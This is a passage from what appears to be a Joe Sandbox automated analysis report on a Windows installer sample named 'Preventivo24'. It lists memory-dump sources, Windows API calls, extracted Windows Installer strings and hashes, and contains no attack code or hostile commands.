                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeCloseFindNotification
                                                                              • String ID:
                                                                              • API String ID: 2591292051-0
                                                                              • Opcode ID: a407b3ec0339be8287e4a61ff876a465378e1f2ff9f8ba2e53f10f5cfbbb96f3
                                                                              • Instruction ID: ebc0266b0f94c96a557d5998334281165972f4851cfb8fe97ddb934c684e1d07
                                                                              • Opcode Fuzzy Hash: a407b3ec0339be8287e4a61ff876a465378e1f2ff9f8ba2e53f10f5cfbbb96f3
                                                                              • Instruction Fuzzy Hash: B8C08C306002104BD7306A18B608B82B2DC5F04700F044459A82ED3240CBB0D8408750
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 100$10000$100000$12000$120000$1500$15000$1500000$1800$2000$20000$200000$3000$30000$3000000$500$5000$6000$800$8000$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppSearch$BindImage$Complus$Component$Component_$CostFinalize$CostInitialize$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature_$File$FileCost$FileSize$Font$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$InstallValidate$Location$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Patch$PatchFiles$PatchSize$ProcessComponents$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveExistingProducts$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveODBC$RemoveRegistry$RemoveRegistryValues$RemoveShortcuts$SelfReg$SelfRegModules$SelfUnregModules$ServiceControl$ServiceInstall$Shortcut$StartServices$StopServices$TypeLib$UnpublishComponents$UnpublishFeatures$UnregisterClassInfo$UnregisterComPlus$UnregisterExtensionInfo$UnregisterFonts$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$~
                                                                              • API String ID: 0-2910470256
                                                                              • Opcode ID: a8e31b566961664872a0159ab1687c323801ade37eba7ea704e1bd472b538bcc
                                                                              • Instruction ID: e4140d683bfd0138280084887194e754e29e251d5719d5d569cffbace388f197
                                                                              • Opcode Fuzzy Hash: a8e31b566961664872a0159ab1687c323801ade37eba7ea704e1bd472b538bcc
                                                                              • Instruction Fuzzy Hash: 11737F20E473C4EAD36CEBB5AA0635E3A61AB66705F64934CF0693B2C6DBF505C4C391
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2A23
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2B7E
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2BB3
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2D48
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00EB2D59
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2DA3
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2DCC
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00EB2DD7
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2EF5
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2F2A
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2F84
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB3043
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB29F1
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2B11
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB2B46
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB31BA
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00EB31CB
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB3215
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB323E
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00EB3249
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB334C
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB33A3
                                                                              • VariantClear.OLEAUT32(?), ref: 00EB33CC
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00EB33DA
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant$String$Free$AllocHeap$AllocateFindProcessResource
                                                                              • String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty
                                                                              • API String ID: 2653467708-3153392536
                                                                              • Opcode ID: 207895625b49c8a2124a0a867c0d46dea06dab8f3d981193eccf8125a64a8b11
                                                                              • Instruction ID: 9c494357b5a87331a3846cf073eb2e070f698e587469ba5bca8e8893906f3661
                                                                              • Opcode Fuzzy Hash: 207895625b49c8a2124a0a867c0d46dea06dab8f3d981193eccf8125a64a8b11
                                                                              • Instruction Fuzzy Hash: B0E28C71D10249DFDB14DFB8C8457EEBBB0BF48314F24925AE919B7291EB34AA85CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(011D00A4,C0000000,00000003,00000000,00000004,00000080,00000000,B5580983,-00000001,011D0098,011D0080), ref: 00FF6985
                                                                              • GetLastError.KERNEL32 ref: 00FF69AD
                                                                              • OutputDebugStringW.KERNEL32(00000000,00000020), ref: 00FF6A32
                                                                              • OutputDebugStringW.KERNEL32(00000000,?,0000001C), ref: 00FF6B62
                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000001C), ref: 00FF6BFE
                                                                              • WriteFile.KERNEL32(00000000,011CF558,00000000,00000002,00000000,?,0000001D), ref: 00FF6D75
                                                                              • FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 00FF6D7E
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • WriteFile.KERNEL32(00000000,?,00000000,00000002,00000000,011456A4,00000002), ref: 00FF6E34
                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001D), ref: 00FF6E3D
                                                                              • WriteFile.KERNEL32(00000000,?,00000000,00000002,00000000,011456A4,00000002), ref: 00FF6EE9
                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001D), ref: 00FF6EF2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$BuffersFlushWrite$DebugOutputString$CreateErrorHeapLastPointerProcess
                                                                              • String ID: LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
                                                                              • API String ID: 2331954151-4230748128
                                                                              • Opcode ID: a973a14a13a57e2f40f6776386ae0e6277169159e28db69a58e851d0b8eb729a
                                                                              • Instruction ID: 340e3ab90436bb6ccf182fa2cb9b2cc45fe00386af0c2504a58d831cc76bd2fc
                                                                              • Opcode Fuzzy Hash: a973a14a13a57e2f40f6776386ae0e6277169159e28db69a58e851d0b8eb729a
                                                                              • Instruction Fuzzy Hash: CF128B31A006099BDB14DF68C945B7DBBB6FF48320F184269E925EB3D1DB34AD02DB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • lstrcmpiW.KERNEL32(?,?,msix,00000004,?,?,?,?, ?(-|/)+q,01147316,?), ref: 00EC3003
                                                                              • lstrcmpiW.KERNEL32(?,?,msixbundle,0000000A,msix,00000004,?,?,?,?, ?(-|/)+q,01147316,?), ref: 00EC3183
                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00EC37E4
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?, ?(-|/)+q,01147316,?), ref: 00EC3740
                                                                                • Part of subcall function 00EA5220: FindClose.KERNEL32(00000000), ref: 00EA536F
                                                                                • Part of subcall function 00FC0AF0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,B5580983,?,00000000), ref: 00FC0B3B
                                                                                • Part of subcall function 00FC0AF0: GetLastError.KERNEL32(?,00000000), ref: 00FC0B45
                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00EC3AB7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Cpp_errorThrow_lstrcmpistd::_$CloseErrorFindFormatHeapLastMessageProcessSleep
                                                                              • String ID: ?(-|/)+q$Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
                                                                              • API String ID: 2536901295-140134217
                                                                              • Opcode ID: 541bc7a6eb4256b999df438e0ccccedf7d558e970e9c291e1a22f879761ad5bb
                                                                              • Instruction ID: 9300c3bbb3bd92ad2b93dc561052d49b9dcb8124d33e24cef6fc386170e2ae8a
                                                                              • Opcode Fuzzy Hash: 541bc7a6eb4256b999df438e0ccccedf7d558e970e9c291e1a22f879761ad5bb
                                                                              • Instruction Fuzzy Hash: 93A2BC71D00218CFDB24DF68C945BADB7B1AF44318F24829DE819B7281DB75AE86CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00EA3465
                                                                              • ShowWindow.USER32(?,00000000), ref: 00EA3484
                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EA3492
                                                                              • GetWindowRect.USER32(?,?), ref: 00EA34A9
                                                                              • ShowWindow.USER32(?,00000000), ref: 00EA34CA
                                                                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00EA34E1
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              • ShowWindow.USER32(?,?,?,00000000), ref: 00EA368D
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00EA36C1
                                                                              • ShowWindow.USER32(?,?,?,00000000), ref: 00EA36DF
                                                                              • GetWindowRect.USER32(?,?), ref: 00EA3709
                                                                              • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00EA3898
                                                                              • GetWindowRect.USER32(?,?), ref: 00EA3949
                                                                              • GetWindowRect.USER32(?,?), ref: 00EA3994
                                                                              • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00EA39D2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Window$LongRectShow$MessageSend$AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 2680428312-0
                                                                              • Opcode ID: 0a8e423aa687ccd09dffa5e919d2fc26813ad287ae8b9135c9c9b42e1cceabf7
                                                                              • Instruction ID: ab012dc66abbbec873e47ffbcbfe4fa5c5dafe8f5ccf30b3947690a8daac41f4
                                                                              • Opcode Fuzzy Hash: 0a8e423aa687ccd09dffa5e919d2fc26813ad287ae8b9135c9c9b42e1cceabf7
                                                                              • Instruction Fuzzy Hash: EE328A71A04205AFCB25CF68D484AAEBBF5BF8D304F10555DF855AB260DB30FA45CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E98A00: EnterCriticalSection.KERNEL32(011D536C,B5580983,00000000,?,?,?,?,?,?,00E98169,010B530D,000000FF), ref: 00E98A3D
                                                                                • Part of subcall function 00E98A00: LoadCursorW.USER32(00000000,00007F00), ref: 00E98AB8
                                                                                • Part of subcall function 00E98A00: LoadCursorW.USER32(00000000,00007F00), ref: 00E98B60
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E985E0
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00E9861B
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E986E9
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E986F9
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E98708
                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E98169,00000000), ref: 00E9871A
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00E98728
                                                                              • SetWindowTextW.USER32(?,01142730), ref: 00E987DA
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00E9880B
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00E98819
                                                                              • GlobalUnlock.KERNEL32(?), ref: 00E9886B
                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00E98901
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E98924
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E98993
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$String$FreeGlobal$AllocCursorLoad$CriticalEnterLockNtdllProc_SectionTextUnlock
                                                                              • String ID:
                                                                              • API String ID: 3547321447-0
                                                                              • Opcode ID: 4d1fa6c9f221f356ea3d1d2e17b00625fb1a4aee31ae1b60d57e5eb5e2506c3b
                                                                              • Instruction ID: 0d44abdb8db40505b0229c927e31d54a192cb82395000851bf1023165f967cf4
                                                                              • Opcode Fuzzy Hash: 4d1fa6c9f221f356ea3d1d2e17b00625fb1a4aee31ae1b60d57e5eb5e2506c3b
                                                                              • Instruction Fuzzy Hash: B2E1C271A01209AFDF14DFA8C944BAEBBB9AF4A314F140169E815F73A0DB759D40CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EBF797
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ' AND `Control_`='$AiTabPage$ControlEvent$Dialog$SpawnDialog$Title$`Dialog_`='
                                                                              • API String ID: 3850602802-1412757306
                                                                              • Opcode ID: b51c3c3db08a9123dd761a14a24c49b8839cda1ae5a3dc9048df81b4d121ef5d
                                                                              • Instruction ID: b00f465eda617d50c7d072ae56e3bc1a1c2e9c778f0d399ab3f820d5a922acef
                                                                              • Opcode Fuzzy Hash: b51c3c3db08a9123dd761a14a24c49b8839cda1ae5a3dc9048df81b4d121ef5d
                                                                              • Instruction Fuzzy Hash: 6D829B71E00258CFCB18DF68C954BEEBBB1BF58304F144299E849B7391DB74AA85CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
                                                                                • Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A
                                                                              • GetStdHandle.KERNEL32(000000F5,?,B5580983,?,?), ref: 00FC3B47
                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 00FC3B4E
                                                                              • GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 00FC3B62
                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00FC3B69
                                                                              • GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,011456A4,00000002,?,?), ref: 00FC3C22
                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00FC3C29
                                                                              • IsWindow.USER32(00000000), ref: 00FC3EC8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleHandle$AttributeExclusiveLockText$AcquireBufferInfoReleaseScreenWindow
                                                                              • String ID: Error
                                                                              • API String ID: 2349801371-2619118453
                                                                              • Opcode ID: 2e8c13a1cbcba9289adbd6d44d2d7d8442f8cd75327e4513a731aac53fafb5ab
                                                                              • Instruction ID: 96d8c17d2fae11afd57d23a28c4217b5ffe4dd9841693ff45b2463e26ee78258
                                                                              • Opcode Fuzzy Hash: 2e8c13a1cbcba9289adbd6d44d2d7d8442f8cd75327e4513a731aac53fafb5ab
                                                                              • Instruction Fuzzy Hash: E542BE70D0025ACFDB28DF68C945BEDBBB1BF54314F1082ADE469A7681EB746A84DF40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00EB4F2B
